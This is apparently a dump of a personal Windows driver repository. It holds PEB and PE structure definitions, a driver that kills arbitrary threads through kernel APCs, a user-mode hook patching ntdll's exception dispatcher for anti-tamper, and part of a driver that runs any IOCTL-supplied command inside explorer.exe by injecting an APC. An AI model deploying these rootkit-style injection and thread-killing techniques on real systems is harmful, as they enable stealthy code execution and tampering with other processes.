81 | // 82 | // NT additional fields. 83 | // 84 | 85 | DWORD ImageBase; 86 | DWORD SectionAlignment; 87 | DWORD FileAlignment; 88 | WORD MajorOperatingSystemVersion; 89 | WORD MinorOperatingSystemVersion; 90 | WORD MajorImageVersion; 91 | WORD MinorImageVersion; 92 | WORD MajorSubsystemVersion; 93 | WORD MinorSubsystemVersion; 94 | DWORD Win32VersionValue; 95 | DWORD SizeOfImage; 96 | DWORD SizeOfHeaders; 97 | DWORD CheckSum; 98 | WORD Subsystem; 99 | WORD DllCharacteristics; 100 | DWORD SizeOfStackReserve; 101 | DWORD SizeOfStackCommit; 102 | DWORD SizeOfHeapReserve; 103 | DWORD SizeOfHeapCommit; 104 | DWORD LoaderFlags; 105 | DWORD NumberOfRvaAndSizes; 106 | IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; 107 | } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; 108 | 109 | typedef IMAGE_OPTIONAL_HEADER32 IMAGE_OPTIONAL_HEADER; 110 | typedef PIMAGE_OPTIONAL_HEADER32 PIMAGE_OPTIONAL_HEADER; 111 | 112 | typedef struct _IMAGE_THUNK_DATA32 { 113 | union { 114 | DWORD ForwarderString; // PBYTE 115 | DWORD Function; // PDWORD 
116 | DWORD Ordinal; 117 | DWORD AddressOfData; // PIMAGE_IMPORT_BY_NAME 118 | } u1; 119 | } IMAGE_THUNK_DATA32; 120 | typedef IMAGE_THUNK_DATA32 * PIMAGE_THUNK_DATA32; 121 | typedef IMAGE_THUNK_DATA32 IMAGE_THUNK_DATA; 122 | typedef PIMAGE_THUNK_DATA32 PIMAGE_THUNK_DATA; 123 | 124 | typedef struct _IMAGE_IMPORT_DESCRIPTOR { 125 | union { 126 | DWORD Characteristics; // 0 for terminating null import descriptor 127 | DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA) 128 | }; 129 | DWORD TimeDateStamp; // 0 if not bound, 130 | // -1 if bound, and real date\time stamp 131 | // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND) 132 | // O.W. date/time stamp of DLL bound to (Old BIND) 133 | 134 | DWORD ForwarderChain; // -1 if no forwarders 135 | DWORD Name; 136 | DWORD FirstThunk; // RVA to IAT (if bound this IAT has actual addresses) 137 | } IMAGE_IMPORT_DESCRIPTOR; 138 | typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR; 139 | 140 | 141 | typedef struct _IMAGE_EXPORT_DIRECTORY { 142 | DWORD Characteristics; 143 | DWORD TimeDateStamp; 144 | WORD MajorVersion; 145 | WORD MinorVersion; 146 | DWORD Name; 147 | DWORD Base; 148 | DWORD NumberOfFunctions; 149 | DWORD NumberOfNames; 150 | DWORD AddressOfFunctions; // RVA from base of image 151 | DWORD AddressOfNames; // RVA from base of image 152 | DWORD AddressOfNameOrdinals; // RVA from base of image 153 | } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; 154 | 155 | 156 | #define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory 157 | #define IMAGE_DIRECTORY_ENTRY_EXPORT 0 158 | 159 | typedef unsigned char *PBYTE; 160 | 161 | typedef struct _GENERATE_NAME_CONTEXT { 162 | USHORT Checksum; 163 | BOOLEAN CheckSumInserted; 164 | UCHAR NameLength; 165 | WCHAR NameBuffer[8]; 166 | ULONG ExtensionLength; 167 | WCHAR ExtensionBuffer[4]; 168 | ULONG LastIndexValue; 169 | } GENERATE_NAME_CONTEXT, *PGENERATE_NAME_CONTEXT; 170 | 171 | 172 | typedef struct _IMAGE_FILE_HEADER { 173 | WORD 
Machine; 174 | WORD NumberOfSections; 175 | DWORD TimeDateStamp; 176 | DWORD PointerToSymbolTable; 177 | DWORD NumberOfSymbols; 178 | WORD SizeOfOptionalHeader; 179 | WORD Characteristics; 180 | } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; 181 | 182 | #define SEC_IMAGE 0x01000000 183 | #define SEC_BASED 0x00200000 184 | typedef struct _SECTION_IMAGE_INFORMATION { 185 | PVOID EntryPoint; 186 | ULONG StackZeroBits; 187 | ULONG StackReserved; 188 | ULONG StackCommit; 189 | ULONG ImageSubsystem; 190 | WORD SubsystemVersionLow; 191 | WORD SubsystemVersionHigh; 192 | ULONG Unknown1; 193 | ULONG ImageCharacteristics; 194 | ULONG ImageMachineType; 195 | ULONG Unknown2[3]; 196 | } SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; 197 | 198 | typedef struct _IMAGE_NT_HEADERS { 199 | DWORD Signature; 200 | IMAGE_FILE_HEADER FileHeader; 201 | IMAGE_OPTIONAL_HEADER32 OptionalHeader; 202 | } IMAGE_NT_HEADERS, *PIMAGE_NT_HEADERS; 203 | 204 | #define FLINKOFFSET 0xA0 205 | #define PEBOFFSET 0x1B0 206 | 207 | typedef void (*PPEBLOCKROUTINE)(PVOID PebLock); 208 | 209 | typedef struct _LDR_MODULE { 210 | LIST_ENTRY InLoadOrderModuleList; 211 | LIST_ENTRY InMemoryOrderModuleList; 212 | LIST_ENTRY InInitializationOrderModuleList; 213 | PVOID BaseAddress; 214 | PVOID EntryPoint; 215 | ULONG SizeOfImage; 216 | UNICODE_STRING FullDllName; 217 | UNICODE_STRING BaseDllName; 218 | ULONG Flags; 219 | SHORT LoadCount; 220 | SHORT TlsIndex; 221 | LIST_ENTRY HashTableEntry; 222 | ULONG TimeDateStamp; 223 | } LDR_MODULE, *PLDR_MODULE; 224 | 225 | typedef struct _PEB_LDR_DATA 226 | { 227 | ULONG Length; 228 | BOOLEAN Initialized; 229 | PVOID SsHandle; 230 | LIST_ENTRY InLoadOrderModuleList; 231 | LIST_ENTRY InMemoryOrderModuleList; 232 | LIST_ENTRY InInitializationOrderModuleList; 233 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 234 | 235 | typedef struct _PEB_FREE_BLOCK { 236 | struct _PEB_FREE_BLOCK *Next; 237 | ULONG Size; 238 | } PEB_FREE_BLOCK, *PPEB_FREE_BLOCK; 239 | 240 | typedef struct 
_RTL_DRIVE_LETTER_CURDIR { 241 | USHORT Flags; 242 | USHORT Length; 243 | ULONG TimeStamp; 244 | UNICODE_STRING DosPath; 245 | } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; 246 | 247 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 248 | ULONG MaximumLength; 249 | ULONG Length; 250 | ULONG Flags; 251 | ULONG DebugFlags; 252 | PVOID ConsoleHandle; 253 | ULONG ConsoleFlags; 254 | HANDLE StdInputHandle; 255 | HANDLE StdOutputHandle; 256 | HANDLE StdErrorHandle; 257 | UNICODE_STRING CurrentDirectoryPath; 258 | HANDLE CurrentDirectoryHandle; 259 | UNICODE_STRING DllPath; 260 | UNICODE_STRING ImagePathName; 261 | UNICODE_STRING CommandLine; 262 | PVOID Environment; 263 | ULONG StartingPositionLeft; 264 | ULONG StartingPositionTop; 265 | ULONG Width; 266 | ULONG Height; 267 | ULONG CharWidth; 268 | ULONG CharHeight; 269 | ULONG ConsoleTextAttributes; 270 | ULONG WindowFlags; 271 | ULONG ShowWindowFlags; 272 | UNICODE_STRING WindowTitle; 273 | UNICODE_STRING DesktopName; 274 | UNICODE_STRING ShellInfo; 275 | UNICODE_STRING RuntimeData; 276 | RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20]; 277 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 278 | 279 | typedef struct _PEB { 280 | BOOLEAN InheritedAddressSpace; 281 | BOOLEAN ReadImageFileExecOptions; 282 | BOOLEAN BeingDebugged; 283 | BOOLEAN Spare; 284 | HANDLE Mutant; 285 | PVOID ImageBaseAddress; 286 | PPEB_LDR_DATA LoaderData; 287 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 288 | PVOID SubSystemData; 289 | PVOID ProcessHeap; 290 | PVOID FastPebLock; 291 | PPEBLOCKROUTINE FastPebLockRoutine; 292 | PPEBLOCKROUTINE FastPebUnlockRoutine; 293 | ULONG EnvironmentUpdateCount; 294 | PVOID *KernelCallbackTable; 295 | PVOID EventLogSection; 296 | PVOID EventLog; 297 | PPEB_FREE_BLOCK FreeList; 298 | ULONG TlsExpansionCounter; 299 | PVOID TlsBitmap; 300 | ULONG TlsBitmapBits[0x2]; 301 | PVOID ReadOnlySharedMemoryBase; 302 | PVOID ReadOnlySharedMemoryHeap; 303 | PVOID *ReadOnlyStaticServerData; 304 | 
PVOID AnsiCodePageData; 305 | PVOID OemCodePageData; 306 | PVOID UnicodeCaseTableData; 307 | ULONG NumberOfProcessors; 308 | ULONG NtGlobalFlag; 309 | UCHAR Spare2[0x4]; 310 | LARGE_INTEGER CriticalSectionTimeout; 311 | ULONG HeapSegmentReserve; 312 | ULONG HeapSegmentCommit; 313 | ULONG HeapDeCommitTotalFreeThreshold; 314 | ULONG HeapDeCommitFreeBlockThreshold; 315 | ULONG NumberOfHeaps; 316 | ULONG MaximumNumberOfHeaps; 317 | PVOID **ProcessHeaps; 318 | PVOID GdiSharedHandleTable; 319 | PVOID ProcessStarterHelper; 320 | PVOID GdiDCAttributeList; 321 | PVOID LoaderLock; 322 | ULONG OSMajorVersion; 323 | ULONG OSMinorVersion; 324 | ULONG OSBuildNumber; 325 | ULONG OSPlatformId; 326 | ULONG ImageSubSystem; 327 | ULONG ImageSubSystemMajorVersion; 328 | ULONG ImageSubSystemMinorVersion; 329 | ULONG GdiHandleBuffer[0x22]; 330 | ULONG PostProcessInitRoutine; 331 | ULONG TlsExpansionBitmap; 332 | UCHAR TlsExpansionBitmapBits[0x80]; 333 | ULONG SessionId; 334 | } PEB, *PPEB; 335 | 336 | #endif -------------------------------------------------------------------------------- /KernelAndUserHook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=KernelAndUserHook 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /KillThread/LDasm.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/KillThread/LDasm.c -------------------------------------------------------------------------------- /KillThread/LDasm.h: -------------------------------------------------------------------------------- 1 | /* 2 | */ 3 | 4 | #ifndef _LDASM_ 5 | #define _LDASM_ 6 | 7 | 
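#ifdef __cplusplus
extern "C" {
#endif

/* LDasm length disassembler. SizeOfCode returns the encoded length of the
 * x86 instruction at Code (0 when it cannot be decoded) and stores through
 * pOpcode a pointer into the instruction that the caller uses to read the
 * opcode bytes. */
unsigned long __fastcall SizeOfCode(void *Code, unsigned char **pOpcode);

unsigned long __fastcall SizeOfProc(void *Proc);

char __fastcall IsRelativeCmd(unsigned char *pOpcode);

#ifdef __cplusplus
}
#endif

#endif

--------------------------------------------------------------------------------
/KillThread/main.c:
--------------------------------------------------------------------------------
#include "ntddk.h"
#include "LDasm.h"

/* Not in the public DDK headers: APC environment selector for KeInitializeApc. */
typedef enum _KAPC_ENVIRONMENT {
    OriginalApcEnvironment,
    AttachedApcEnvironment,
    CurrentApcEnvironment,
    InsertApcEnvironment
} KAPC_ENVIRONMENT;

/* Undocumented kernel APC interface: exported by ntoskrnl, not declared in ntddk.h. */
NTKERNELAPI
void
KeInitializeApc(
    PKAPC Apc,
    PETHREAD Thread,
    KAPC_ENVIRONMENT Environment,
    PKKERNEL_ROUTINE KernelRoutine,
    PKRUNDOWN_ROUTINE RundownRoutine,
    PKNORMAL_ROUTINE NormalRoutine,
    KPROCESSOR_MODE ProcessorMode,
    PVOID NormalContext );

NTKERNELAPI
BOOLEAN
KeInsertQueueApc(
    PKAPC Apc,
    PVOID SystemArgument1,
    PVOID SystemArgument2,
    KPRIORITY Increment );

/* Bit set in the ETHREAD flags word located by GetThreadFlagsOffset. */
#define PS_CROSS_THREAD_FLAGS_SYSTEM 0x00000010UL

/* How many bytes of PsTerminateSystemThread the signature scan may cover. */
#define THREAD_FLAGS_SCAN_LIMIT 0x100

/*
 * Locate the offset of the thread-flags byte inside ETHREAD by decoding the
 * first THREAD_FLAGS_SCAN_LIMIT bytes of PsTerminateSystemThread and taking
 * the displacement of the first "F6 80 disp32 imm8" instruction
 * (test byte ptr [eax+disp32], imm8).
 *
 * Returns that displacement, or 0 when the decoder gives up or no such
 * instruction is found within the limit.
 *
 * NOTE(review): this is a build-specific heuristic. It assumes the first
 * such TEST is the system-thread check, that the displacement fits in
 * 16 bits (only the low USHORT of disp32 is read), and that the routine
 * has not been hot-patched.
 */
ULONG GetThreadFlagsOffset()
{
    UCHAR *cPtr, *pOpcode;
    ULONG Length;
    USHORT Offset;

    for (cPtr = (PUCHAR)PsTerminateSystemThread;
         cPtr < (PUCHAR)PsTerminateSystemThread + THREAD_FLAGS_SCAN_LIMIT;
         cPtr += Length)
    {
        Length = SizeOfCode(cPtr, &pOpcode);
        if (!Length) break;                 /* undecodable byte: stop instead of looping in place */
        if (*(USHORT *)pOpcode == 0x80F6)   /* little-endian view of the bytes F6 80 */
        {
            Offset = *(USHORT *)((ULONG)pOpcode + 2);
            return Offset;
        }
    }
    return 0;
}

/*
 * Kernel-mode APC routine, executed in the context of the thread the APC
 * was queued to. The APC object was dequeued before this runs and nothing
 * else references it, so it is freed first. The thread's flags word is then
 * marked PS_CROSS_THREAD_FLAGS_SYSTEM (presumably so that
 * PsTerminateSystemThread's own check passes) and the thread is terminated.
 * PsTerminateSystemThread does not return on success; the else branch is
 * reached only when the flags offset could not be determined.
 */
void KernelTerminateThreadRoutine(
    IN PKAPC Apc,
    IN OUT PKNORMAL_ROUTINE *NormalRoutine,
    IN OUT PVOID *NormalContext,
    IN OUT PVOID *SystemArgument1,
    IN OUT PVOID *SystemArgument2)
{
    ULONG ThreadFlagsOffset = GetThreadFlagsOffset();
    PULONG ThreadFlags;

    DbgPrint("[TerminateThread] KernelTerminateThreadRoutine.\n");
    ExFreePool(Apc);
    if (ThreadFlagsOffset)
    {
        ThreadFlags = (ULONG *)((ULONG)(PsGetCurrentThread()) + ThreadFlagsOffset);
        *ThreadFlags |= PS_CROSS_THREAD_FLAGS_SYSTEM;
        PsTerminateSystemThread(STATUS_SUCCESS);
    }
    else
    {
        DbgPrint("cannot get thread flags offset!\n");
    }
}

/*
 * Queue a kernel APC that terminates Thread from inside its own context.
 *
 * Returns TRUE when the APC was queued (the thread dies asynchronously when
 * the APC is delivered). Returns FALSE when Thread is NULL or not a resident
 * address, when the APC object could not be allocated, or when
 * KeInsertQueueApc refused it (e.g. the thread is already exiting); in the
 * last case the APC is fre here because KernelRoutine will never run.
 *
 * Fixes relative to the original: the ExAllocatePool result was used
 * unchecked (NULL dereference inside KeInitializeApc on pool exhaustion) and
 * a rejected APC leaked.
 *
 * NOTE(review): MmIsAddressValid only says the page is resident; it does not
 * prove that Thread is an ETHREAD. Callers should pass an object obtained
 * from PsLookupThreadByThreadId, never a raw address.
 */
BOOLEAN TerminateThread(PETHREAD Thread)
{
    PKAPC Apc;

    if (!Thread || !MmIsAddressValid(Thread))
        return FALSE;

    Apc = ExAllocatePool(NonPagedPool, sizeof(KAPC));
    if (!Apc)
        return FALSE;

    KeInitializeApc(
        Apc,
        Thread,
        OriginalApcEnvironment,
        KernelTerminateThreadRoutine,
        NULL,
        NULL,
        KernelMode,
        NULL);
    if (!KeInsertQueueApc(Apc, NULL, NULL, 0))
    {
        ExFreePool(Apc);   /* not queued: the kernel routine will not free it for us */
        return FALSE;
    }
    return TRUE;
}

VOID Unload(PDRIVER_OBJECT driver)
{
    DbgPrint("[TerminateThread] Unloaded!\n");
}

/*
 * NOTE(review): TARGET_ETHREAD is a raw kernel address copied from one
 * debugging session. It is only meaningful on that machine and boot; on any
 * other system it points at arbitrary memory and the APC will corrupt or
 * crash the kernel. A real driver must resolve the thread with
 * PsLookupThreadByThreadId and dereference it afterwards.
 */
#define TARGET_ETHREAD ((PETHREAD)0x81982540)

NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg)
{
    DbgPrint("[TerminateThread] DriverEntry!\n");
    driver->DriverUnload = Unload;
    if (!TerminateThread(TARGET_ETHREAD))
        DbgPrint("[TerminateThread] could not queue the terminate APC.\n");
    return STATUS_SUCCESS;
}

--------------------------------------------------------------------------------
/KillThread/makefile:
--------------------------------------------------------------------------------
#
# DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
# file to this component.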
This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /KillThread/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=KillThread 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c\ 14 | LDasm.c -------------------------------------------------------------------------------- /PAGE_GURAD保护数据/PEB.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/PAGE_GURAD保护数据/PEB.suo -------------------------------------------------------------------------------- /PAGE_GURAD保护数据/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #pragma comment(lib, "ntdll.lib") 7 | 8 | typedef struct _MAD_MEM 9 | { 10 | MEMORY_BASIC_INFORMATION mbi; 11 | BOOL bAccess; 12 | }MAD_MEM, *PMAD_MEM; 13 | 14 | typedef ULONG (WINAPI *pRtlExceptionDispatcher)(PEXCEPTION_RECORD pExcptRec, CONTEXT* pContext); 15 | static pRtlExceptionDispatcher OldRtlExceptionDispatcher = NULL; 16 | 17 | BOOL bHook = FALSE; 18 | std::list memoryBlocks; 19 | 20 | typedef PIMAGE_NT_HEADERS 21 | (*PRtlImageNtHeader)(PVOID ModuleAddress); 22 | 23 | PRtlImageNtHeader RtlImageNtHeader; 24 | 25 | BOOL Check(PEXCEPTION_RECORD pExcptRec, CONTEXT *pContext) 26 | { 27 | ULONG_PTR Eip = (ULONG_PTR)pExcptRec->ExceptionAddress; 28 | if (!memoryBlocks.empty() && pExcptRec->ExceptionCode == EXCEPTION_GUARD_PAGE) 29 | { 30 | std::list::iterator b; 31 | for (b = memoryBlocks.begin(); b != 
memoryBlocks.end(); b++) 32 | { 33 | PMAD_MEM mBlock = *b; 34 | if (Eip >= (ULONG_PTR)mBlock->mbi.BaseAddress 35 | && Eip<= (ULONG_PTR)mBlock->mbi.BaseAddress + mBlock->mbi.RegionSize) 36 | { 37 | mBlock->bAccess = TRUE; 38 | *b = mBlock; 39 | return TRUE; 40 | } 41 | } 42 | } 43 | return FALSE; 44 | } 45 | 46 | ULONG WINAPI MyRtlExceptionDispatcher( PEXCEPTION_RECORD pExcptRec, CONTEXT *pContext) 47 | { 48 | if (Check(pExcptRec, pContext)) return 1; 49 | return OldRtlExceptionDispatcher(pExcptRec, pContext); 50 | } 51 | 52 | void Install() 53 | { 54 | BYTE *pAddr = (BYTE*)::GetProcAddress(::GetModuleHandleA("ntdll.dll"), "KiUserExceptionDispatcher"); 55 | if (bHook || !pAddr) return; 56 | while (*pAddr != 0xE8) 57 | { 58 | pAddr++; 59 | } 60 | printf("%08x\n", pAddr); 61 | OldRtlExceptionDispatcher = (pRtlExceptionDispatcher)((*(DWORD*)(pAddr+1))+5+(DWORD)pAddr); 62 | printf("%08x\n", OldRtlExceptionDispatcher); 63 | DWORD dwNewAddr = (DWORD)MyRtlExceptionDispatcher - (DWORD)pAddr - 5; 64 | DWORD dwOld; 65 | VirtualProtect((LPVOID)pAddr, 0x1000, PAGE_EXECUTE_READWRITE, &dwOld); 66 | RtlCopyMemory((PVOID)((DWORD)pAddr + 1), (PVOID)&dwNewAddr, 4); 67 | bHook = TRUE; 68 | } 69 | 70 | DWORD WINAPI MADThread(LPVOID Param) 71 | { 72 | std::list::iterator b; 73 | for (b=memoryBlocks.begin(); b!=memoryBlocks.end(); b++) 74 | { 75 | DWORD dwOld; 76 | PMAD_MEM mBlock = *b; 77 | mBlock->bAccess = FALSE; 78 | *b = mBlock; 79 | VirtualProtect( 80 | mBlock->mbi.BaseAddress, 81 | mBlock->mbi.RegionSize, 82 | mBlock->mbi.Protect | PAGE_GUARD, 83 | &dwOld); 84 | } 85 | while (1) 86 | { 87 | std::list::iterator b; 88 | for (b = memoryBlocks.begin(); b!=memoryBlocks.end(); b++) 89 | { 90 | DWORD dwOld; 91 | PMAD_MEM mBlock = *b; 92 | MEMORY_BASIC_INFORMATION mbi; 93 | VirtualQueryEx( 94 | GetCurrentProcess(), 95 | mBlock->mbi.BaseAddress, 96 | &mbi, 97 | sizeof(mbi)); 98 | if ((mbi.Protect & PAGE_GUARD) != PAGE_GUARD) 99 | { 100 | if (!mBlock->bAccess) 101 | { 102 | ExitProcess(-1); 
103 | } 104 | } 105 | mBlock->bAccess = FALSE; 106 | *b = mBlock; 107 | VirtualProtect( 108 | mBlock->mbi.BaseAddress, 109 | mBlock->mbi.RegionSize, 110 | mBlock->mbi.Protect | PAGE_GUARD, 111 | &dwOld); 112 | } 113 | Sleep(1000*30); 114 | } 115 | } 116 | 117 | void InitMAD() 118 | { 119 | MEMORY_BASIC_INFORMATION meminfo; 120 | unsigned char *addr = NULL; 121 | unsigned char *endaddr = NULL; 122 | DWORD totalBytes = 0; 123 | 124 | Install(); 125 | 126 | RtlImageNtHeader = (PRtlImageNtHeader)GetProcAddress(::GetModuleHandleA("ntdll.dll"), "RtlImageNtHeader"); 127 | VirtualQuery((LPCVOID)GetModuleHandleA("game.dll"), &meminfo, sizeof(meminfo)); 128 | addr = (unsigned char*)meminfo.AllocationBase; 129 | endaddr = addr + RtlImageNtHeader(addr)->OptionalHeader.SizeOfImage; 130 | 131 | while (addr < endaddr) 132 | { 133 | if (!VirtualQueryEx(GetCurrentProcess(), addr, &meminfo, sizeof(meminfo))) 134 | break; 135 | BOOL Commited = meminfo.State & MEM_COMMIT; 136 | BOOL Readable = meminfo.Protect & (PAGE_READWRITE | PAGE_READONLY); 137 | BOOL Guarded = meminfo.Protect & PAGE_GUARD; 138 | 139 | if (Commited && Readable && !Guarded) 140 | { 141 | totalBytes += (DWORD)meminfo.RegionSize; 142 | PMAD_MEM pNew = new MAD_MEM; 143 | pNew->mbi = meminfo; 144 | pNew->bAccess = FALSE; 145 | memoryBlocks.push_back(pNew); 146 | } 147 | addr = (unsigned char *)meminfo.BaseAddress + meminfo.RegionSize; 148 | } 149 | CreateThread( 150 | NULL, 151 | 0, 152 | MADThread, 153 | NULL, 154 | 0, 155 | NULL); 156 | } 157 | 158 | int main() 159 | { 160 | Install(); 161 | return 0; 162 | } -------------------------------------------------------------------------------- /RPC/APCExec.c: -------------------------------------------------------------------------------- 1 | #include "Process.h" 2 | 3 | const WCHAR devicename[]=L"\\Device\\MyRPC"; 4 | const WCHAR devicelink[]=L"\\??\\MyRPC"; 5 | 6 | VOID KE_Unload(PDRIVER_OBJECT driver) 7 | { 8 | UNICODE_STRING devlink; 9 | 
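RtlInitUnicodeString(&devlink,devicelink);
    IoDeleteSymbolicLink(&devlink);
    IoDeleteDevice(driver->DeviceObject);
    DbgPrint("KernelExec -> Driver Unloaded");
}

/* Longest command line accepted, including the terminating NUL. It has to
 * fit the string slot inside the ApcCreateProcess stub (see Process.c). */
#define KE_MAX_COMMAND 50

/* TRUE if buf contains a NUL within its first len bytes. */
static BOOLEAN KE_IsTerminated(const UCHAR *buf, ULONG len)
{
    ULONG i;
    for (i = 0; i < len; i++)
    {
        if (buf[i] == 0) return TRUE;
    }
    return FALSE;
}

/*
 * Single dispatch routine for every IRP major function this driver registers.
 *
 * Only IRP_MJ_DEVICE_CONTROL does work: the METHOD_BUFFERED input buffer is
 * treated as an ANSI command line and passed to RunProcess. Every other major
 * (create/close/cleanup/read/write/internal ioctl) completes with
 * STATUS_SUCCESS and zero bytes transferred.
 *
 * Validation added relative to the original: the request fails with
 * STATUS_INVALID_PARAMETER unless SystemBuffer is present (it is NULL for
 * METHOD_NEITHER codes), InputBufferLength is non-zero, and a NUL occurs in
 * the first min(InputBufferLength, KE_MAX_COMMAND) bytes. The original
 * printed and strlen()'d the buffer unconditionally, reading past a
 * user-supplied unterminated buffer in kernel mode, and dereferenced NULL
 * for METHOD_NEITHER requests. The dispatch also returns the status it
 * completes the IRP with instead of a bare 0.
 *
 * NOTE(review): every control code is accepted (the inner switch only has a
 * default case) and the device object is created with the default security
 * descriptor, so presumably any local user able to open \\.\MyRPC can have
 * a command run in explorer.exe's context. No IOCTL definition exists in
 * this tree to restrict it to, so that design is documented, not changed.
 */
NTSTATUS KE_Dispatch(PDEVICE_OBJECT DeviceObject, PIRP pIrp)
{
    PIO_STACK_LOCATION irpsp;
    NTSTATUS status = STATUS_SUCCESS;
    PUCHAR charBuffer;
    ULONG Length;

    irpsp = IoGetCurrentIrpStackLocation(pIrp);
    charBuffer = (PUCHAR)pIrp->AssociatedIrp.SystemBuffer;

    switch (irpsp->MajorFunction)
    {
    case IRP_MJ_CREATE:
        DbgPrint("IRP_MJ_CREATE");
        break;
    case IRP_MJ_CLOSE:
        DbgPrint("IRP_MJ_CLOSE");
        break;
    case IRP_MJ_DEVICE_CONTROL:
        Length = irpsp->Parameters.DeviceIoControl.InputBufferLength;
        if (charBuffer == NULL || Length == 0)
        {
            status = STATUS_INVALID_PARAMETER;
            break;
        }
        if (Length > KE_MAX_COMMAND) Length = KE_MAX_COMMAND;
        if (!KE_IsTerminated(charBuffer, Length))
        {
            status = STATUS_INVALID_PARAMETER;   /* no NUL inside the slot RunProcess can use */
            break;
        }
        switch (irpsp->Parameters.DeviceIoControl.IoControlCode)
        {
        default:
            DbgPrint("Process : %s\n", charBuffer);
            RunProcess((LPSTR)charBuffer);
            break;
        }
        break;
    default:
        status = STATUS_SUCCESS;
        break;
    }
    pIrp->IoStatus.Status = status;
    pIrp->IoStatus.Information = 0;
    IoCompleteRequest(pIrp, IO_NO_INCREMENT);
    return status;
}

/*
 * Create \Device\MyRPC and its \??\MyRPC link and route all supported majors
 * to KE_Dispatch.
 *
 * Fixes relative to the original: the IoCreateDevice and IoCreateSymbolicLink
 * results are checked. The original ignored both and always reported
 * success, so a failed create left a loaded driver with no device (and
 * KE_Unload later deleting a NULL device object); a failed link now deletes
 * the device again before returning the error.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    NTSTATUS NtStatus;
    PDEVICE_OBJECT pDeviceObject = NULL;
    UNICODE_STRING usDeviceName, usDosDeviceName;

    RtlInitUnicodeString(&usDeviceName, devicename);
    RtlInitUnicodeString(&usDosDeviceName, devicelink);

    NtStatus = IoCreateDevice(
        pDriverObject,
        0,
        &usDeviceName,
        FILE_DEVICE_UNKNOWN,
        0,
        FALSE,
        &pDeviceObject );
    if (!NT_SUCCESS(NtStatus))
    {
        DbgPrint("KernelExec -> IoCreateDevice failed 0x%08X", NtStatus);
        return NtStatus;
    }

    NtStatus = IoCreateSymbolicLink(&usDosDeviceName, &usDeviceName);
    if (!NT_SUCCESS(NtStatus))
    {
        DbgPrint("KernelExec -> IoCreateSymbolicLink failed 0x%08X", NtStatus);
        IoDeleteDevice(pDeviceObject);
        return NtStatus;
    }

    pDriverObject->MajorFunction[IRP_MJ_CLEANUP] = KE_Dispatch;
    pDriverObject->MajorFunction[IRP_MJ_CLOSE] = KE_Dispatch;
    pDriverObject->MajorFunction[IRP_MJ_CREATE] = KE_Dispatch;
    pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = KE_Dispatch;
    pDriverObject->MajorFunction[IRP_MJ_INTERNAL_DEVICE_CONTROL] = KE_Dispatch;
    pDriverObject->MajorFunction[IRP_MJ_READ] = KE_Dispatch;
    pDriverObject->MajorFunction[IRP_MJ_WRITE] = KE_Dispatch;
    pDriverObject->DriverUnload = KE_Unload;

    DbgPrint("KernelExec -> Driver Loaded");
    return NtStatus;
}

--------------------------------------------------------------------------------
/RPC/Process.c:
--------------------------------------------------------------------------------
#include "Process.h"

/* Not in ntifs.h: APC environment selector for KeInitializeApc. */
typedef enum
{
    OriginalApcEnvironment,
    AttachedApcEnvironment,
    CurrentApcEnvironment
} KAPC_ENVIRONMENT;

void ApcKernelRoutine(
    IN struct _KAPC *Apc,
    IN OUT PKNORMAL_ROUTINE *NormalRoutine,
    IN OUT PVOID *NormalContext,
    IN OUT PVOID *SystemArgument1,
    IN OUT PVOID *SystemArgument2);
NTSTATUS InstallUserModeApc(LPSTR lpProcess, ULONG pTargetThread, ULONG pTargetProcess);
void ApcCreateProcess(PVOID NormalContext, PVOID SystemArgument1, PVOID SystemArgument2);
void ApcCreateProcessEnd();

/*
 * Layout of the user-mode stub ApcCreateProcess, which InstallUserModeApc
 * patches before queueing it (byte offsets into the stub):
 *   +0x01  imm32 of `mov eax, <addr>`  <- WinExecOffset
 *   +0x09  imm32 of `push <imm32>`     <- address of the string at +0x14
 *   +0x14  command-line string, APC_CMDLINE_MAX bytes, NUL padded
 * The string area lies inside the NOP sled of the stub, so the sled must
 * stay at least 0x14 + APC_CMDLINE_MAX bytes long.
 */
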